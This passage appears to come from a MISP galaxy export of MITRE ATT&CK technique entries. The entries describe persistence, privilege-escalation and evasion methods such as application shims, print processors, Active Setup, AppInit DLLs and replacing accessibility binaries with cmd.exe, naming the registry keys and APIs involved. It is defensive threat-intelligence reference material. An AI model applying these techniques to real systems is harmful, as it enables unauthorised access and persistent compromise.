- `<code>hklm\software\microsoft\windows nt\currentversion\appcompatflags\custom</code>`

To keep shims secure, Windows designed them to run in user mode so they cannot modify the kernel and you must have administrator privileges to install a shim. However, certain shims can be used to [Bypass User Account Control](https://attack.mitre.org/techniques/T1548/002) (UAC and RedirectEXE), inject DLLs into processes (InjectDLL), disable Data Execution Prevention (DisableNX) and Structure Exception Handling (DisableSEH), and intercept memory addresses (GetProcAddress).

Utilizing these shims may allow an adversary to perform several malicious acts such as elevate privileges, install backdoors, disable defenses like Windows Defender, etc. (Citation: FireEye Application Shimming) Shims can also be abused to establish persistence by continuously being invoked by affected programs.

The tag is: `misp-galaxy:mitre-attack-pattern="Application Shimming - T1546.011"`

**Table 3620. Table References**

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Plist Modification - T1547.011

Adversaries may modify plist files to run a program during system boot or user login. Property list (plist) files contain all of the information that macOS and OS X uses to configure applications and services. These files are UTF-8 encoded and formatted like XML documents via a series of keys surrounded by < >. They detail when programs should execute, file paths to the executables, program arguments, required OS permissions, and many others. Plists are located in certain locations depending on their purpose such as <code>/Library/Preferences</code> (which execute with elevated privileges) and <code>~/Library/Preferences</code> (which execute with a user’s privileges).

Adversaries can modify plist files to execute their code as part of establishing persistence. Plists may also be used to elevate privileges since they may execute in the context of another user. (Citation: Sofacy Komplex Trojan)

A specific plist used for execution at login is <code>com.apple.loginitens.plist</code>. (Citation: Methods of Mac Malware Persistence) Applications under this plist run under the logged in user’s context, and will be started every time the user logs in. Login items installed using the Service Management Framework are not visible in the System Preferences and can only be removed by the application that created them. (Citation: Adding Login Items) Users have direct control over login items installed using a shared file list which are also visible in System Preferences (Citation: Adding Login Items). Some of these applications can open visible dialogs to the user, but they don’t all have to since there is an option to “hide” the window. If an adversary can register their own login item or modified an existing one, then they can use it to execute their code for a persistence mechanism each time the user logs in (Citation: Malware Persistence on OS X) (Citation: OSX.Dok Malware). The API method <code> SMLoginItemSetEnabled</code> can be used to set Login Items, but scripting languages like [AppleScript](https://attack.mitre.org/techniques/T1059/002) can do this as well. (Citation: Adding Login Items)

The tag is: misp-galaxy:mitre-attack-pattern="Plist Modification - T1547.011"

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Print Processors - T1547.012

Adversaries may abuse print processors to run malicious DLLs during system boot for persistence and/or privilege escalation. Print processors are DLLs that are loaded by the print spooler service, spoolsv.exe, during boot.

Adversaries may abuse the print spooler service by adding print processors that load malicious DLLs at startup. A print processor can be installed through the `<code>AddPrintProcessor</code>` API call with an account that has `<code>SeLoadDriverPrivilege</code>` enabled. Alternatively, a print processor can be registered to the print spooler service by adding the `<code>HKLM\SYSTEM\[CurrentControlSet or ControlSet001]\Control\Print\Environments\[Windows architecture: e.g., Windows x64]\Print Processors\[user defined]\Driver</code>` Registry key that points to the DLL. For the print processor to be correctly installed, it must be located in the system print-processor directory that can be found with the `<code>GetPrintProcessorDirectory</code>` API call. After the print processors are installed, the print spooler service, which starts during boot, must be restarted in order for them to run. The print spooler service runs under SYSTEM level permissions, therefore print processors installed by an adversary may run under elevated privileges.

The tag is: `misp-galaxy:mitre-attack-pattern="Print Processors - T1547.012"`

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PowerShell Profile - T1546.013

Adversaries may gain persistence and elevate privileges by executing malicious content triggered by PowerShell profiles. A PowerShell profile (`<code>profile.ps1</code>`) is a script that runs when [PowerShell](https://attack.mitre.org/techniques/T1059/001) starts and can be used as a logon script to customize user environments.

[PowerShell](https://attack.mitre.org/techniques/T1059/001) supports several profiles depending on the user or host program. For example, there can be different profiles for [PowerShell](https://attack.mitre.org/techniques/T1059/001) host programs such as the PowerShell console, PowerShell ISE or Visual Studio Code. An administrator can also configure a profile that applies to all users and host programs on the local computer. (Citation: Microsoft About Profiles)

Adversaries may modify these profiles to include arbitrary commands, functions, modules, and/or [PowerShell](https://attack.mitre.org/techniques/T1059/001) drives to gain persistence. Every time a user opens a [PowerShell](https://attack.mitre.org/techniques/T1059/001) session the modified script will be executed unless the `<code>-NoProfile</code>` flag is used when it is launched. (Citation: ESET Turla PowerShell May 2019)
An adversary may also be able to escalate privileges if a script in a PowerShell profile is loaded and executed by an account with higher privileges, such as a domain administrator. (Citation: Wits End and Shady PowerShell Profiles)

The tag is: *misp-galaxy:mitre-attack-pattern=*"PowerShell Profile - T1546.013"

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### Active Setup - T1547.014

Adversaries may achieve persistence by adding a Registry key to the Active Setup of the local machine. Active Setup is a Windows mechanism that is used to execute programs when a user logs in. The value stored in the Registry key will be executed after a user logs into the computer. (Citation: Klein Active Setup 2010) These programs will be executed under the context of the user and will have the account’s associated permissions level.

Adversaries may abuse Active Setup by creating a key under `<code>HKLM\SOFTWARE\Microsoft\Active Setup\Installed Components</code>` and setting a malicious value for `<code>StubPath</code>`. This value will serve as the program that will be executed when a user logs into the computer. (Citation: Mandiant Glyer APT 2010) (Citation: Citizenlab Packrat 2015) (Citation: FireEye CFR Watering Hole 2012) (Citation: SECURELIST Bright Star 2015) (Citation: paloalto Tropic Trooper 2016)

Adversaries can abuse these components to execute malware, such as remote access tools, to maintain persistence through system reboots. Adversaries may also use [Masquerading](https://attack.mitre.org/techniques/T1036) to make the Registry entries look as if they are associated with legitimate programs.

The tag is: *misp-galaxy:mitre-attack-pattern=*"Active Setup - T1547.014"

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Identify groups/roles - T1270

This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1270).

Personnel internally to a company may belong to a group or maintain a role with electronic specialized access, authorities, or privilege that make them an attractive target for an adversary. One example of this is a system administrator. (Citation: RSA-APTRecon)

The tag is: misp-galaxy:mitre-attack-pattern="Identify groups/roles - T1270"

Table 3625. Table References

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Proxy/protocol relays - T1304

This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1304).

Proxies act as an intermediary for clients seeking resources from other systems. Using a proxy may make it more difficult to track back the origin of a network communication. (Citation: APT1)

The tag is: misp-galaxy:mitre-attack-pattern="Proxy/protocol relays - T1304"

Table 3626. Table References

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Scheduled Task/Job - T1053

Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically requires being a member of an admin or otherwise
Adversaries may use task scheduling to execute programs at system startup or on a scheduled basis for persistence. These mechanisms can also be abused to run a process under the context of a specified account (such as one with elevated permissions/privileges).

The tag is: *misp-galaxy:mitre-attack-pattern="Scheduled Task/Job - T1053"*

### Table 3627. Table References

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**Scheduled Task/Job - T1603**

Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. On Android and iOS, APIs and libraries exist to facilitate scheduling tasks to execute at a specified date, time, or interval.

On Android, the *WorkManager* API allows asynchronous tasks to be scheduled with the system. *WorkManager* was introduced to unify task scheduling on Android, using *JobScheduler*, *GcmNetworkManager*, and *AlarmManager* internally. *WorkManager* offers a lot of flexibility for scheduling, including periodically, one time, or constraint-based (e.g. only when the device is charging).(Citation: Android WorkManager)

On iOS, the *NSBackgroundActivityScheduler* API allows asynchronous tasks to be scheduled with the system. The tasks can be scheduled to be repeating or non-repeating, however, the system chooses when the tasks will be executed. The app can choose the interval for repeating tasks, or the delay between scheduling and execution for one-time tasks.(Citation: Apple NSBackgroundActivityScheduler)

The tag is: *misp-galaxy:mitre-attack-pattern="Scheduled Task/Job - T1603"*

### Table 3628. Table References

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<td><a href="https://developer.android.com/topic/libraries/architecture/workmanager">https://developer.android.com/topic/libraries/architecture/workmanager</a></td>
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**Develop KITs/KIQs - T1227**

This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1227).
Leadership derives Key Intelligence Topics (KITs) and Key Intelligence Questions (KIQs) from the areas of most interest to them. KITs are an expression of management’s intelligence needs with respect to early warning, strategic and operational decisions, knowing the competition, and understanding the competitive situation. KIQs are the critical questions aligned by KIT which provide the basis for collection plans, create a context for analytic work, and/or identify necessary external operations. (Citation: Herring1999)

The tag is: misp-galaxy:mitre-attack-pattern="Develop KITs/KIQs - T1227"

Table 3629. Table References

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**System Shutdown/Reboot - T1529**

Adversaries may shutdown/reboot systems to interrupt access to, or aid in the destruction of, those systems. Operating systems may contain commands to initiate a shutdown/reboot of a machine. In some cases, these commands may also be used to initiate a shutdown/reboot of a remote computer. (Citation: Microsoft Shutdown Oct 2017) Shutting down or rebooting systems may disrupt access to computer resources for legitimate users.

Adversaries may attempt to shutdown/reboot a system after impacting it in other ways, such as [Disk Structure Wipe](https://attack.mitre.org/techniques/T1561/002) or [Inhibit System Recovery](https://attack.mitre.org/techniques/T1490), to hasten the intended effects on system availability. (Citation: Talos Nyetya June 2017) (Citation: Talos Olympic Destroyer 2018)

The tag is: misp-galaxy:mitre-attack-pattern="System Shutdown/Reboot - T1529"

Table 3630. Table References

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<tr>
<td><a href="https://blog.talosintelligence.com/2018/02/olympic-destroyer.html">https://blog.talosintelligence.com/2018/02/olympic-destroyer.html</a></td>
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**Virtualization/Sandbox Evasion - T1497**

Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Adversaries may use several methods to accomplish [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) such as checking for security monitoring tools (e.g., Sysinternals, Wireshark, etc.) or other system artifacts associated with analysis or virtualization. Adversaries may also check for legitimate user activity to help determine if it is in an analysis environment. Additional methods include use of sleep timers or loops within malware code to avoid operating within a temporary sandbox. (Citation: Unit 42 Pirpi July 2015)

The tag is: `misp-galaxy:mitre-attack-pattern="Virtualization/Sandbox Evasion - T1497"`

### Data Obfuscation - T1001

Adversaries may obfuscate command and control traffic to make it more difficult to detect. Command and control (C2) communications are hidden (but not necessarily encrypted) in an attempt to make the content more difficult to discover or decipher and to make the communication less conspicuous and hide commands from being seen. This encompasses many methods, such as adding junk data to protocol traffic, using steganography, or impersonating legitimate protocols.

The tag is: `misp-galaxy:mitre-attack-pattern="Data Obfuscation - T1001"

### Web Shell - T1100

A Web shell is a Web script that is placed on an openly accessible Web server to allow an adversary to use the Web server as a gateway into a network. A Web shell may provide a set of functions to execute or a command-line interface on the system that hosts the Web server. In addition to a server-side script, a Web shell may have a client interface program that is used to talk to the Web server (see, for example, China Chopper Web shell client). (Citation: Lee 2013)

Web shells may serve as [Redundant Access](https://attack.mitre.org/techniques/T1108) or as a persistence mechanism in case an adversary’s primary access methods are detected and removed.

The tag is: `misp-galaxy:mitre-attack-pattern="Web Shell - T1100"

Web Shell - T1100 has relationships with:

- revoked-by: `misp-galaxy:mitre-attack-pattern="Web Shell - T1505.003"` with estimative-
Automated Exfiltration - T1020

Adversaries may exfiltrate data, such as sensitive documents, through the use of automated processing after being gathered during Collection.

When automated exfiltration is used, other exfiltration techniques likely apply as well to transfer the information out of the network, such as [Exfiltration Over C2 Channel](https://attack.mitre.org/techniques/T1041) and [Exfiltration Over Alternative Protocol](https://attack.mitre.org/techniques/T1048).

The tag is: `misp-galaxy:mitre-attack-pattern="Automated Exfiltration - T1020"`

Hardware Additions - T1200

Adversaries may introduce computer accessories, computers, or networking hardware into a system or network that can be used as a vector to gain access. While public references of usage by APT groups are scarce, many penetration testers leverage hardware additions for initial access. Commercial and open source products are leveraged with capabilities such as passive network tapping (Citation: Ossmann Star Feb 2011), man-in-the-middle encryption breaking (Citation: Aleks Weapons Nov 2015), keystroke injection (Citation: Hak5 RubberDuck Dec 2016), kernel memory reading via DMA (Citation: Frisk DMA August 2016), adding new wireless access to an existing network (Citation: McMillan Pwn March 2012), and others.

The tag is: `misp-galaxy:mitre-attack-pattern="Hardware Additions - T1200"`
An adversary may compress data (e.g., sensitive documents) that is collected prior to exfiltration in order to make it portable and minimize the amount of data sent over the network. The compression is done separately from the exfiltration channel and is performed using a custom program or algorithm, or a more common compression library or utility such as 7zip, RAR, ZIP, or zlib.

The tag is: "misp-galaxy:mitre-attack-pattern="Data Compressed - T1002"

Data Compressed - T1002 has relationships with:

- revoked-by: "misp-galaxy:mitre-attack-pattern="Archive Collected Data - T1560" with estimative-language:likelihood-probability="almost-certain"

### Network Sniffing - T1040

Adversaries may sniff network traffic to capture information about an environment, including authentication material passed over the network. Network sniffing refers to using the network interface on a system to monitor or capture information sent over a wired or wireless connection. An adversary may place a network interface into promiscuous mode to passively access data in transit over the network, or use span ports to capture a larger amount of data.

Data captured via this technique may include user credentials, especially those sent over an insecure, unencrypted protocol. Techniques for name service resolution poisoning, such as [LLMNR/NBT-NS Poisoning and SMB Relay](https://attack.mitre.org/techniques/T1557/001), can also be used to capture credentials to websites, proxies, and internal systems by redirecting traffic to an adversary.

Network sniffing may also reveal configuration details, such as running services, version numbers, and other network characteristics (e.g. IP addresses, hostnames, VLAN IDs) necessary for subsequent Lateral Movement and/or Defense Evasion activities.

The tag is: "misp-galaxy:mitre-attack-pattern="Network Sniffing - T1040"
New Service - T1050

When operating systems boot up, they can start programs or applications called services that perform background system functions. (Citation: TechNet Services) A service's configuration information, including the file path to the service's executable, is stored in the Windows Registry.

Adversaries may install a new service that can be configured to execute at startup by using utilities to interact with services or by directly modifying the Registry. The service name may be disguised by using a name from a related operating system or benign software with [Masquerading](https://attack.mitre.org/techniques/T1036). Services may be created with administrator privileges but are executed under SYSTEM privileges, so an adversary may also use a service to escalate privileges from administrator to SYSTEM. Adversaries may also directly start services through [Service Execution](https://attack.mitre.org/techniques/T1035).

The tag is: `misp-galaxy:mitre-attack-pattern="New Service - T1050"`

New Service - T1050 has relationships with:

- revoked-by: `misp-galaxy:mitre-attack-pattern="Windows Service - T1543.003"` with estimative-language:likelihood-probability="almost-certain"

Weaken Encryption - T1600

Adversaries may compromise a network device's encryption capability in order to bypass encryption that would otherwise protect data communications. (Citation: Cisco Synful Knock Evolution)

Encryption can be used to protect transmitted network traffic to maintain its confidentiality (protect against unauthorized disclosure) and integrity (protect against unauthorized changes).
Encryption ciphers are used to convert a plaintext message to ciphertext and can be computationally intensive to decipher without the associated decryption key. Typically, longer keys increase the cost of cryptanalysis, or decryption without the key.

Adversaries can compromise and manipulate devices that perform encryption of network traffic. For example, through behaviors such as [Modify System Image](https://attack.mitre.org/techniques/T1601), [Reduce Key Space](https://attack.mitre.org/techniques/T1600/001), and [Disable Crypto Hardware](https://attack.mitre.org/techniques/T1600/002), an adversary can negatively effect and/or eliminate a device’s ability to securely encrypt network traffic. This poses a greater risk of unauthorized disclosure and may help facilitate data manipulation, Credential Access, or Collection efforts. (Citation: Cisco Blog Legacy Device Attacks)

The tag is: *misp-galaxy:mitre-attack-pattern="Weaken Encryption - T1600"

Table 3639. Table References

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**Fallback Channels - T1008**

Adversaries may use fallback or alternate communication channels if the primary channel is compromised or inaccessible in order to maintain reliable command and control and to avoid data transfer thresholds.

The tag is: *misp-galaxy:mitre-attack-pattern="Fallback Channels - T1008"

Table 3640. Table References

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**Binary Padding - T1009**

Adversaries can use binary padding to add junk data and change the on-disk representation of malware without affecting the functionality or behavior of the binary. This will often increase the size of the binary beyond what some security tools are capable of handling due to file size limitations.

Binary padding effectively changes the checksum of the file and can also be used to avoid hash-based blacklists and static anti-virus signatures.(Citation: ESET OceanLotus) The padding used is commonly generated by a function to create junk data and then appended to the end or applied to sections of malware.(Citation: Securelist Malware Tricks April 2017) Increasing the file size may
decrease the effectiveness of certain tools and detection capabilities that are not designed or configured to scan large files. This may also reduce the likelihood of being collected for analysis. Public file scanning services, such as VirusTotal, limits the maximum size of an uploaded file to be analyzed. (Citation: VirusTotal FAQ)

The tag is: `misp-galaxy:mitre-attack-pattern="Binary Padding - T1009"`

Binary Padding - T1009 has relationships with:

- revoked-by: `misp-galaxy:mitre-attack-pattern="Binary Padding - T1027.001"` with estimative-language:likelihood-probability="almost-certain"

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**Brute Force - T1110**

Adversaries may use brute force techniques to gain access to accounts when passwords are unknown or when password hashes are obtained. Without knowledge of the password for an account or set of accounts, an adversary may systematically guess the password using a repetitive or iterative mechanism. Brute forcing passwords can take place via interaction with a service that will check the validity of those credentials or offline against previously acquired credential data, such as password hashes.

The tag is: `misp-galaxy:mitre-attack-pattern="Brute Force - T1110"`

Table 3642. Table References

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**Query Registry - T1012**

Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.

The Registry contains a significant amount of information about the operating system, configuration, software, and security. (Citation: Wikipedia Windows Registry) Information can easily be queried using the `Reg` utility, though other means to access the Registry exist. Some of the information may help adversaries to further their
operation within a network. Adversaries may use the information from [Query Registry](https://attack.mitre.org/techniques/T1012) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.

The tag is: `misp-galaxy:mitre-attack-pattern="Query Registry - T1012"`

### Remote Services - T1021

Adversaries may use [Valid Accounts](https://attack.mitre.org/techniques/T1078) to log into a service specifically designed to accept remote connections, such as telnet, SSH, and VNC. The adversary may then perform actions as the logged-on user.

In an enterprise environment, servers and workstations can be organized into domains. Domains provide centralized identity management, allowing users to login using one set of credentials across the entire network. If an adversary is able to obtain a set of valid domain credentials, they could login to many different machines using remote access protocols such as secure shell (SSH) or remote desktop protocol (RDP).(Citation: SSH Secure Shell)(Citation: TechNet Remote Desktop Services)

The tag is: `misp-galaxy:mitre-attack-pattern="Remote Services - T1021"`

### Web Service - T1102

Adversaries may use an existing, legitimate external Web service as a means for relaying data to/from a compromised system. Popular websites and social media acting as a mechanism for C2 may give a significant amount of cover due to the likelihood that hosts within a network are already communicating with them prior to a compromise. Using common services, such as those offered by Google or Twitter, makes it easier for adversaries to hide in expected noise. Web service providers commonly use SSL/TLS encryption, giving adversaries an added level of protection.

Use of Web services may also protect back-end C2 infrastructure from discovery through malware.
binary analysis while also enabling operational resiliency (since this infrastructure may be
dynamically changed).

The tag is: *misp-galaxy:mitre-attack-pattern=*"Web Service - T1102"

### Table 3645. Table References

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### AppInit DLLs - T1103

Dynamic-link libraries (DLLs) that are specified in the AppInit_DLLs value in the Registry keys
<code>HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Windows</code> or
<code>HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Windows</code> are loaded by user32.dll into every process that loads
user32.dll. In practice this is nearly every program, since user32.dll is a very common library.
(Citation: Endgame Process Injection July 2017) Similar to [Process
Injection](https://attack.mitre.org/techniques/T1055), these values can be abused to obtain
persistence and privilege escalation by causing a malicious DLL to be loaded and run in the context
of separate processes on the computer. (Citation: AppInit Registry)

The AppInit DLL functionality is disabled in Windows 8 and later versions when secure boot is
enabled. (Citation: AppInit Secure Boot)

The tag is: *misp-galaxy:mitre-attack-pattern=*"AppInit DLLs - T1103"

AppInit DLLs - T1103 has relationships with:

- revoked-by: *misp-galaxy:mitre-attack-pattern=*"AppInit DLLs - T1546.010" with estimative-
  language:likelihood-probability="almost-certain"

### Table 3646. Table References

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### Port Monitors - T1013

A port monitor can be set through the (Citation: AddMonitor) API call to set a DLL to be loaded at
startup. (Citation: AddMonitor) This DLL can be located in <code>C:\Windows\System32</code> and
will be loaded by the print spooler service, spoolsv.exe, on boot. The spoolsv.exe process also runs under SYSTEM level permissions. (Citation: Bloxham) Alternatively, an arbitrary DLL can be loaded if permissions allow writing a fully-qualified pathname for that DLL to `<code>HKLM\SYSTEM\CurrentControlSet\Control\Print\Monitors</code>.

The Registry key contains entries for the following:

- Local Port
- Standard TCP/IP Port
- USB Monitor
- WSD Port

Adversaries can use this technique to load malicious code at startup that will persist on system reboot and execute as SYSTEM.

The tag is: `misp-galaxy:mitre-attack-pattern="Port Monitors - T1013"

Port Monitors - T1013 has relationships with:

- revoked-by: `misp-galaxy:mitre-attack-pattern="Port Monitors - T1547.010"` with estimative-language:likelihood-probability="almost-certain"

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### Accessibility Features - T1015

Windows contains accessibility features that may be launched with a key combination before a user has logged in (for example, when the user is on the Windows logon screen). An adversary can modify the way these programs are launched to get a command prompt or backdoor without logging in to the system.

Two common accessibility programs are `<code>C:\Windows\System32\sethc.exe</code>`, launched when the shift key is pressed five times and `<code>C:\Windows\System32\utilman.exe</code>`, launched when the Windows + U key combination is pressed. The sethc.exe program is often referred to as "sticky keys", and has been used by adversaries for unauthenticated access through a remote desktop login screen. (Citation: FireEye Hikit Rootkit)

Depending on the version of Windows, an adversary may take advantage of these features in different ways because of code integrity enhancements. In newer versions of Windows, the replaced binary needs to be digitally signed for x64 systems, the binary must reside in
<code>%systemdir%</code>, and it must be protected by Windows File or Resource Protection (WFP/WRP). (Citation: DEFCON2016 Sticky Keys) The debugger method was likely discovered as a potential workaround because it does not require the corresponding accessibility feature binary to be replaced. Examples for both methods:

For simple binary replacement on Windows XP and later as well as and Windows Server 2003/R2 and later, for example, the program (e.g., <code>C:\Windows\System32\utilman.exe</code>) may be replaced with "cmd.exe" (or another program that provides backdoor access). Subsequently, pressing the appropriate key combination at the login screen while sitting at the keyboard or when connected over [Remote Desktop Protocol](https://attack.mitre.org/techniques/T1076) will cause the replaced file to be executed with SYSTEM privileges. (Citation: Tilbury 2014)

For the debugger method on Windows Vista and later as well as Windows Server 2008 and later, for example, a Registry key may be modified that configures "cmd.exe," or another program that provides backdoor access, as a "debugger" for the accessibility program (e.g., "utilman.exe"). After the Registry is modified, pressing the appropriate key combination at the login screen while at the keyboard or when connected with RDP will cause the "debugger" program to be executed with SYSTEM privileges. (Citation: Tilbury 2014)

Other accessibility features exist that may also be leveraged in a similar fashion: (Citation: DEFCON2016 Sticky Keys)

- On-Screen Keyboard: <code>C:\Windows\System32\osk.exe</code>
- Magnifier: <code>C:\Windows\System32\Magnify.exe</code>
- Narrator: <code>C:\Windows\System32\Narrator.exe</code>
- Display Switcher: <code>C:\Windows\System32\DisplaySwitch.exe</code>
- App Switcher: <code>C:\Windows\System32\AtBroker.exe</code>

The tag is: misp-galaxy:mitre-attack-pattern="Accessibility Features - T1015"

Accessibility Features - T1015 has relationships with:


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1624
Clipboard Modification - T1510

Adversaries may abuse clipboard functionality to intercept and replace information in the Android device clipboard.(Citation: ESET Clipboard Modification February 2019)(Citation: Welivesecurity Clipboard Modification February 2019)(Citation: Syracuse Clipboard Modification 2014) Malicious applications may monitor the clipboard activity through the `<code>ClipboardManager.OnPrimaryClipChangedListener</code>` interface on Android to determine when the clipboard contents have changed.(Citation: Dr.Webb Clipboard Modification origin2 August 2018)(Citation: Dr.Webb Clipboard Modification origin August 2018) Listening to clipboard activity, reading the clipboard contents, and modifying the clipboard contents requires no explicit application permissions and can be performed by applications running in the background, however, this behavior has changed with the release of Android 10.(Citation: Android 10 Privacy Changes)

Adversaries may use [Clipboard Modification](https://attack.mitre.org/techniques/T1510) to replace text prior to being pasted, for example, replacing a copied Bitcoin wallet address with a wallet address that is under adversarial control.

[Clipboard Modification](https://attack.mitre.org/techniques/T1510) had been seen within the Android/Clipper.C trojan. This sample had been detected by ESET in an application distributed through the Google Play Store targeting cryptocurrency wallet numbers.(Citation: ESET Clipboard Modification February 2019)

The tag is: `misp-galaxy:mitre-attack-pattern="Clipboard Modification - T1510"`

Table 3649. Table References

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Plist Modification - T1150

Property list (plist) files contain all of the information that macOS and OS X uses to configure applications and services. These files are UTF-8 encoded and formatted like XML documents via a series of keys surrounded by `< >`. They detail when programs should execute, file paths to the executables, program arguments, required OS permissions, and many others. plists are located in certain locations depending on their purpose such as `<code>/Library/Preferences</code>` (which execute with elevated privileges) and `<code>~/Library/Preferences</code>` (which execute with a
user's privileges). Adversaries can modify these plist files to point to their own code, can use them to execute their code in the context of another user, bypass whitelisting procedures, or even use them as a persistence mechanism. (Citation: Sofacy Komplex Trojan)

The tag is: misp-galaxy:mitre-attack-pattern="Plist Modification - T1150"

Plist Modification - T1150 has relationships with:


Table 3650. Table References

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<td><a href="https://attack.mitre.org/techniques/T1150">https://attack.mitre.org/techniques/T1150</a></td>
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**Systemd Service - T1501**

Systemd services can be used to establish persistence on a Linux system. The systemd service manager is commonly used for managing background daemon processes (also known as services) and other system resources.(Citation: Linux man-pages: systemd January 2014)(Citation: Freedesktop.org Linux systemd 29SEP2018) Systemd is the default initialization (init) system on many Linux distributions starting with Debian 8, Ubuntu 15.04, CentOS 7, RHEL 7, Fedora 15, and replaces legacy init systems including SysVinit and Upstart while remaining backwards compatible with the aforementioned init systems.

Systemd utilizes configuration files known as service units to control how services boot and under what conditions. By default, these unit files are stored in the `<code>/etc/systemd/system</code>` and `<code>/usr/lib/systemd/system</code>` directories and have the file extension `<code>.service</code>`. Each service unit file may contain numerous directives that can execute system commands.

- ExecStart, ExecStartPre, and ExecStartPost directives cover execution of commands when a service is started manually by 'systemctl' or on system start if the service is set to automatically start.
- ExecReload directive covers when a service restarts.
- ExecStop and ExecStopPost directives cover when a service is stopped or manually by 'systemctl'.

Adversaries have used systemd functionality to establish persistent access to victim systems by creating and/or modifying service unit files that cause systemd to execute malicious commands at recurring intervals, such as at system boot.(Citation: Anomali Rocke March 2019)(Citation: gist Arch package compromise 10JUL2018)(Citation: Arch Linux Package Systemd Compromise BleepingComputer 10JUL2018)(Citation: acroread package compromised Arch Linux Mail 8JUL2018)

While adversaries typically require root privileges to create/modify service unit files in the `<code>/etc/systemd/system</code>` and `<code>/usr/lib/systemd/system</code>` directories, low
privilege users can create/modify service unit files in directories such as
<code>~/.config/systemd/user/</code> to achieve user-level persistence.(Citation: Rapid7 Service Persistence 22JUNE2016)

The tag is: <code>misp-galaxy:mitre-attack-pattern="Systemd Service - T1501"</code>

Systemd Service - T1501 has relationships with:


Table 3651. Table References

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Shared Webroot - T1051

This technique has been deprecated and should no longer be used.

Adversaries may add malicious content to an internally accessible website through an open network file share that contains the website’s webroot or Web content directory (Citation: Microsoft Web Root OCT 2016) (Citation: Apache Server 2018) and then browse to that content with a Web browser to cause the server to execute the malicious content. The malicious content will typically run under the context and permissions of the Web server process, often resulting in local system or administrative privileges, depending on how the Web server is configured.

This mechanism of shared access and remote execution could be used for lateral movement to the system running the Web server. For example, a Web server running PHP with an open network share could allow an adversary to upload a remote access tool and PHP script to execute the RAT on the system running the Web server when a specific page is visited. (Citation: Webroot PHP 2011)

The tag is: <code>misp-galaxy:mitre-attack-pattern="Shared Webroot - T1051"</code>

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1627
Native API - T1106

Adversaries may directly interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes. (Citation: NT API Windows) (Citation: Linux Kernel API) These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.

Functionality provided by native APIs are often also exposed to user-mode applications via interfaces and libraries. For example, functions such as the Windows API `<code>CreateProcess()</code>` or GNU `<code>fork()</code>` will allow programs and scripts to start other processes. (Citation: Microsoft CreateProcess) (Citation: GNU Fork) This may allow API callers to execute a binary, run a CLI command, load modules, etc. as thousands of similar API functions exist for various system operations. (Citation: Microsoft Win32) (Citation: LIBC) (Citation: GLIBC)

Higher level software frameworks, such as Microsoft .NET and macOS Cocoa, are also available to interact with native APIs. These frameworks typically provide language wrappers/abstractions to API functionalities and are designed for ease-of-use/portability of code. (Citation: Microsoft NET) (Citation: Apple Core Services) (Citation: MACOS Cocoa) (Citation: macOS Foundation)

Adversaries may abuse these native API functions as a means of executing behaviors. Similar to [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059), the native API and its hierarchy of interfaces, provide mechanisms to interact with and utilize various components of a victimized system.

The tag is: `misp-galaxy:mitre-attack-pattern="Native API - T1106"`

Table 3653. Table References

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Deploy Container - T1610

Adversaries may deploy a container into an environment to facilitate execution or evade defenses. In some cases, adversaries may deploy a new container to execute processes associated with a particular image or deployment, such as processes that execute or download malware. In others, an adversary may deploy a new container configured without network rules, user limitations, etc. to bypass existing defenses within the environment.

Containers can be deployed by various means, such as via Docker's `<code>create</code>` and `<code>start</code>` APIs or via a web application such as the Kubernetes dashboard or Kubeflow. Adversaries may deploy containers based on retrieved or built malicious images or from benign images that download and execute malicious payloads at runtime.

The tag is: misp-galaxy:mitre-attack-pattern="Deploy Container - T1610"

Table 3654. Table References

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Launch Daemon - T1160

Per Apple’s developer documentation, when macOS and OS X boot up, launchd is run to finish system initialization. This process loads the parameters for each launch-on-demand system-level daemon from the property list (plist) files found in `<code>/System/Library/LaunchDaemons</code>` and `<code>/Library/LaunchDaemons</code>` (Citation: AppleDocs Launch Agent Daemons). These LaunchDaemons have property list files which point to the executables that will be launched (Citation: Methods of Mac Malware Persistence).

Adversaries may install a new launch daemon that can be configured to execute at startup by using launchd or launchctl to load a plist into the appropriate directories (Citation: OSX Malware Detection). The daemon name may be disguised by using a name from a related operating system or benign software (Citation: WireLurker). Launch Daemons may be created with administrator
privileges, but are executed under root privileges, so an adversary may also use a service to escalate privileges from administrator to root.

The plist file permissions must be root:wheel, but the script or program that it points to has no such requirement. So, it is possible for poor configurations to allow an adversary to modify a current Launch Daemon’s executable and gain persistence or Privilege Escalation.

The tag is: misp-galaxy:mitre-attack-pattern="Launch Daemon - T1160"

Launch Daemon - T1160 has relationships with:

- revoked-by: misp-galaxy:mitre-attack-pattern="Launch Daemon - T1543.004" with estimative-language:likelihood-probability="almost-certain"

**File Deletion - T1107**

